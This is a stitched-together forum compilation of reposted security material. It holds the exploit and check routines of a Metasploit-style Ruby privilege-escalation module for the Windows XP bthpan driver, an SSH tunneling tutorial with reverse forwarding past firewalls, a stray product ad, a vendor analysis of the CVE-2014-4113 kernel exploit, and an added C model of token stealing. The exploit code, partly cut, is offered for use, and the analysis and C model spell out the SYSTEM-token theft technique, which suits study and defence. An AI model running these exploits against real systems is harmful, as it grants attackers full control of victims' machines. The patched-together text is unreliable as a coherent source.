    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    if hal_info.nil?
      vprint_error('Failed to disclose hal.dll base address')
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses['HaliQuerySystemInfo'] = hali_query_system_information
    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")

    addresses
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    os = sysinfo["OS"]
    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
    end

    my_target = targets[0]

    print_status("Disclosing the HalDispatchTable address...")
    @addresses = disclose_addresses(my_target)

    # NOTE: the source text is cut here. The lines that stage ring0_shellcode
    # with fill_memory and issue the DeviceIoControl against the device are
    # missing; only the tail of that call's argument list survived:
    #   @addresses["halDispatchTable"] + 0x4, 0)

    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager through NtQueryIntervalProfile()...")
    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)

    print_status("Checking privileges after exploitation...")
    unless is_system?
      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
    end
    print_good("Privilege escalation successful!")

    p = payload.encoded
    print_status("Injecting #{p.length} bytes to memory and executing it...")
    unless execute_shellcode(p)
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end

Sursa: http://www.exploit-db.com/exploits/34982/
22. SSH tunnel

simple port forwarding (SSH tunneling)

This example creates a tunnel for HTTP. This will forward port 80 of your localhost to port 80 of www.example.com.

    ssh -f -N -q -L 80:localhost:80 username@www.example.com

This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on imap.example.com.

    ssh -f -N -q -L 1143:localhost:143 username@imap.example.com

-f tells ssh to go into the background (daemonize).
-N tells ssh that you don't want to run a remote command. That is, you only want to forward ports.
-q tells ssh to be quiet.
-L specifies the port forwarding.

port forwarding through an intermediary

You can have the remote machine forward ports to a third machine. This is useful where you have your local machine outside a firewall; a visible machine on the DMZ; and a third machine invisible to the outside.

This creates a tunnel from your localhost port 81 to 192.168.1.69 port 80 through dmz.example.com. This lets you see the web server from outside a LAN.

    ssh -f -N -q -L 81:192.168.1.69:80 username@dmz.example.com

This example creates a tunnel for SSH itself, over localhost port 2222.

    ssh -f -N -q -L 2222:target-host.example.com:22 username@dmz.example.com

This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on 192.168.1.100 through dmz.example.com.

    ssh -f -N -q -L 1143:192.168.1.100:143 username@dmz.example.com

VNC Viewer uses port 5900. This shows a double-hop (the second ssh runs as the remote command on wan-gateway, so the two forwards chain).

    # localhost --> wan-gateway --> dmz-gateway --> vnc-console
    ssh -L 5900:localhost:5900 root@wan-gateway.example.com ssh -L 5900:vnc-console.example.com:5900 root@dmz-gateway.example.com

reverse port forwarding

This is used in the following situation: You have a server inside a private LAN that you want to connect to from the WAN outside. You can't create a NAT and port forwarding on your firewall to map the machine to the outside. You have a server outside that you can connect to from the server inside the LAN.

What this does is create a connection from the server in the LAN to the server outside. Once that connection is established the server outside starts listening on port 2222. All connections to port 2222 are sent back to port 22 of the server in the LAN. Now you can leave this connection running in your office; go home and ssh to your proxy server at port 2222 and you will be connecting to your server inside the LAN on port 22.

    ssh -f -N -q -R 2222:localhost:22 my_name@remote.example.com

tricky reverse forwarding

This allows a server on an internal LAN to expose a service to the outside WAN. For example, I have a database server that will only accept connections from a specific development box. That dev box is inside the firewall. I want to connect to the database from outside the firewall.

    ssh -t -L 5432:localhost:1999 my_name@firewall.example.com ssh -t db_server ssh -t -R 1999:127.0.0.1:5432 my_name@firewall

Using scp through a DMZ gateway to a machine behind a firewall using a tunnel

First you set up port forwarding through an intermediary. This forwards your localhost port 2222 to port 22 on 192.168.1.100. Remember that 192.168.1.100 is not on your local network; 192.168.1.100 is on the LAN network shared with 208.77.188.166.

    ssh -f -N -q -L 2222:192.168.1.100:22 user@208.77.188.166
    scp -P 2222 transformers.avi user@localhost:.

A diagram might help. Remember, port 22 is the SSH server port on the 192.168.1.100 machine.

    +---------------+      +----------------+      +----------------------+
    | your          |      | remote DMZ     |      | server on remote LAN |
    | local machine |      | server         |      | 192.168.1.100        |
    |               |      | 208.77.188.166 |      |                      |
    |         2222: >------|                |------> :22                  |
    |               |      |\______________/|      |                      |
    |               |      |                |      |                      |
    +---------------+      +----------------+      +----------------------+

Other options

    -o ExitOnForwardFailure=yes \
    -o GSSAPIAuthentication=no \
    -o HashKnownHosts=no \
    -o KbdInteractiveAuthentication=no \
    -o PermitLocalCommand=yes \
    -o LocalCommand="logger connected to %h" \
    -o LocalForward=00:remote.example.com:000 \
    -o NoHostAuthenticationForLocalhost=yes \
    -o ProxyCommand=foo \
    -o RemoteForward=foo \
    -o RequestTTY=yes \
    -o SendEnv=LC_* \
    -o Tunnel=ethernet \
    -o TunnelDevice=any:any \
    -o VerifyHostKeyDNS=yes

SOCKS5 with Firefox

Simple and secure web browsing. You can set up a tunnel as described above or you can use the following technique. This starts SSH on your localhost acting as a SOCKS proxy. Once you start SSH this way you can point any application that supports a SOCKS5 interface to this port. But these instructions will show what you need to do to get Firefox to proxy through SOCKS. Firefox supports SOCKS with no extra add-ons.

Start an ssh connection to a host that you want to proxy through. Use the -D option to specify a SOCKS5 port on your localhost. The port doesn't really matter. You just need to use the same port in your SOCKS client application.

    ssh -D 9999 username@proxy.example.com

In Firefox select "Edit | Preferences | Advanced Tab | Connection Settings button". Then select "Manual proxy configuration". All you need to fill out is "SOCKS Host: Localhost", "Port: 9999", then select "SOCKS v5". It's easy.

This tool can also help in switching the proxy settings on and off: SwitchProxy Tool

Sursa: SSH tunnel - Noah.org
23. Or get yourself an Apple: Mac mini desktop PC with Intel® Core™ i7 2.30GHz processor, 4GB, 2TB, Intel® HD Graphics, OS X Server, RO - eMAG.ro
24. An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113)
6:35 pm (UTC-7) | by Weimin Wu (Threat Analyst)

Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited. This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target SCADA systems.

The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) leveraged vulnerabilities in the Windows kernel (Win32k.sys), affecting most Windows versions. In 2013, only one Windows kernel zero-day was made public; this particular vulnerability only affected some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are possibly shifting their focus back to kernel vulnerabilities.

CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions. With a parameter in the command line, the exploit code can create new processes with System privileges of an assigned program.

EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges needed by attackers. This was seen in Stuxnet, which employed CVE-2010-2743 (also in Win32k.sys) for EoP after using another exploit to infect the system.

The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes:

    70857e02d60c66e27a173f8f292774f1
    f9f01ce747679b82723b989d01c4d927

We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems.

Everything you need to know about the Win32k.sys vulnerability

Win32k.sys is responsible for window management, and any GUI process/thread will use it. Its related user-mode modules are user32.dll and GDI32.dll. Due to the complex interaction with user-mode applications, there are many problems in Win32k.sys.

Let's take a closer look at the vulnerability being exploited. The essential problem is that the function return value is not validated correctly. Programmers tend to overlook this, but doing otherwise is a serious security risk.

In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of a win32k!tagWND structure or the error code -1 or -5. Another function, xxxHandleMenuMessages(), will call it and use its return value as a parameter of xxxSendMessage(). Below is the pseudo code:

    xxxHandleMenuMessages()
    {
        tagWnd* pWnd = xxxMNFindWindowFromPoint(…);
        …
        // without checking if the return value is a valid address
        xxxSendMessage(pwnd, …);
    }

Obviously, if the error code -1 or -5 is used in xxxSendMessage() as an address, it will result in an error, such as a blue screen. In user-mode code, this is currently not exploitable. We will see how the sample exploits this vulnerability in kernel-mode in the next section.

Below are the key steps, or a description of how the exploit occurs:

1. Map a prepared memory section to the NULL page, which includes a fake win32k!tagWND structure and, in that structure, a pointer to shell code for EoP.
2. Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() -5 (0xfffffffb). Because all to-be-checked fields in the fake structure are accessible and hold proper values, xxxSendMessage() will treat -5 as a valid address.
3. It will then call a function pointer in the structure, which is the pointer to the shell code.
4. Replace the token in EPROCESS to elevate to SYSTEM privileges in the shell code.
5. Create a child process with SYSTEM privileges of the assigned program.

The sample uses SetWindowsHookEx() to control xxxMNFindWindowFromPoint() to return -5:

1. Create a window and a 2-level popup menu.
2. Hook that window's wndproc call.
3. Track the popup menu on the window and enter the hook callback.
4. In the hook callback, it changes the wndproc of the menu to another callback.
5. In the menu's callback, it will destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX).
6. This leads xxxMNFindWindowFromPoint() on the destroyed menu to return -5.

Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below. We can see that it gets the EPROCESS of the SYSTEM process (PID=4), and copies its privilege token to the EPROCESS of the current process.

Figure 1. Code snippet of the sample

From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than to exploit vulnerabilities like Internet Explorer UAF vulnerabilities. Some effective protections in user-mode, like DEP, are easily bypassed in kernel-mode exploits. This is because a program, instead of entered data or script, is used to exploit the bug. Such code is by its nature already executable.

With more application sandboxing adopted in the OS, kernel vulnerabilities will be more important for privilege elevation. Though this exploitation method is not new anymore, it will be noticed by attackers, especially now that CVE-2014-4113 is public. During our sample sourcing, we even saw that the source code of an exploit creation tool was exposed. It is expected that more exploit variants will be created by attackers. We believe that threat actors and attackers need kernel vulnerabilities to carry out EoP attacks and break application sandboxing. Once information about these exploitation methods becomes more prevalent, we may see more similar kernel zero-day vulnerabilities in the future.

Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date.

Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel-mode. As such, the access to the null page and shell code will not lead to code execution, although it will lead to crashes.

Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles:

Sandworm to Blacken: The SCADA Connection
An Analysis of Windows Zero-day Vulnerability 'CVE-2014-4114' aka "Sandworm"
MS Zero-Day Used in Attacks Against European Sectors, Industries

Sursa: An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) | Security Intelligence Blog | Trend Micro
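The BthPan module's ring0_shellcode (post 21) and the CVE-2014-4113 sample described above end in the same step: walk EPROCESS.ActiveProcessLinks until UniqueProcessId is 4, take that process's Token, and store it in the current process. The C program below is an added model of that walk over constructed EPROCESS blocks, written for this page; it is not code from either source, it is not kernel code, and it reads no real memory. The offsets 0x84 (UniqueProcessId), 0x88 (ActiveProcessLinks) and 0xc8 (Token) are the Windows XP SP3 x86 values from the module's target table and shellcode bytes; the PIDs, token values, block size and number of processes are made up for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Windows XP SP3 x86 EPROCESS offsets (from the module's target table and
 * the bytes of ring0_shellcode). Block size and count are assumptions. */
#define OFF_UPID    0x84u   /* EPROCESS.UniqueProcessId          */
#define OFF_APLINKS 0x88u   /* EPROCESS.ActiveProcessLinks.Flink */
#define OFF_TOKEN   0xc8u   /* EPROCESS.Token (an _EX_FAST_REF)  */
#define EPROC_SIZE  0x100u
#define NPROCS      4u
#define SYSTEM_PID  4u

/* Constructed "kernel memory": NPROCS EPROCESS blocks; an address is an offset. */
static uint8_t kmem[NPROCS * EPROC_SIZE];

static uint32_t rd32(uint32_t addr) { uint32_t v; memcpy(&v, kmem + addr, 4); return v; }
static void     wr32(uint32_t addr, uint32_t v) { memcpy(kmem + addr, &v, 4); }

/* Lay the blocks out as a circular doubly linked list like PsActiveProcessHead;
 * pids and tokens are the caller's sample values. Flink points at the next
 * block's LIST_ENTRY, which is why the walker subtracts OFF_APLINKS again. */
static void build_process_list(const uint32_t *pids, const uint32_t *tokens) {
    memset(kmem, 0, sizeof kmem);
    for (uint32_t i = 0; i < NPROCS; i++) {
        uint32_t ep   = i * EPROC_SIZE;
        uint32_t next = ((i + 1) % NPROCS) * EPROC_SIZE;
        wr32(ep + OFF_UPID,    pids[i]);
        wr32(ep + OFF_TOKEN,   tokens[i]);
        wr32(ep + OFF_APLINKS, next + OFF_APLINKS);
    }
}

/* The shellcode's loop: mov eax,[eax+0x88]; sub eax,0x88; cmp [eax+0x84],ebx; jne.
 * The real stager has no exit condition and would spin forever on a missing
 * pid; the model stops after one full lap and returns UINT32_MAX instead. */
static uint32_t find_eprocess(uint32_t start, uint32_t pid) {
    uint32_t ep = start;
    for (uint32_t step = 0; step <= NPROCS; step++) {
        ep = rd32(ep + OFF_APLINKS) - OFF_APLINKS;
        if (rd32(ep + OFF_UPID) == pid) return ep;
    }
    return UINT32_MAX;
}

/* Token stealing: copy SYSTEM's token into the target process. The low three
 * bits of an _EX_FAST_REF are a reference count, hence `and edi, 0xfffffff8`. */
static int steal_token(uint32_t current_ep, uint32_t target_pid) {
    uint32_t sys = find_eprocess(current_ep, SYSTEM_PID);
    uint32_t tgt = find_eprocess(current_ep, target_pid);
    if (sys == UINT32_MAX || tgt == UINT32_MAX) return 0;
    uint32_t token = rd32(sys + OFF_TOKEN) & 0xfffffff8u;
    wr32(tgt + OFF_TOKEN, token);
    return 1;
}

static uint32_t token_of(uint32_t pid) {
    uint32_t ep = find_eprocess(0, pid);
    return ep == UINT32_MAX ? 0 : rd32(ep + OFF_TOKEN);
}

/* Builds a fixed sample list, runs the steal for target_pid and returns the
 * target's token afterwards (0 when the pid is not on the list). */
static uint32_t demo_steal(uint32_t target_pid) {
    static const uint32_t pids[NPROCS]   = { SYSTEM_PID, 580u, 1234u, 2048u };
    static const uint32_t tokens[NPROCS] = { 0xe1000127u, 0xe1a00003u, 0xe1b00005u, 0xe1c00001u };
    build_process_list(pids, tokens);
    /* block 0 plays the current process, i.e. what fs:[0x124]->ApcState.Process yields */
    if (!steal_token(0, target_pid)) return 0;
    return token_of(target_pid);
}

int main(void) {
    printf("pid 1234 token after steal: %08x\n", demo_steal(1234));   /* low bits masked off SYSTEM's token */
    printf("pid 9999 (absent)         : %08x\n", demo_steal(9999));
    return 0;
}
```

The masking step is the detail worth remembering when reading either shellcode: copying the raw _EX_FAST_REF would carry the SYSTEM process's in-flight reference-count bits into the target, which is why both samples clear them before the store.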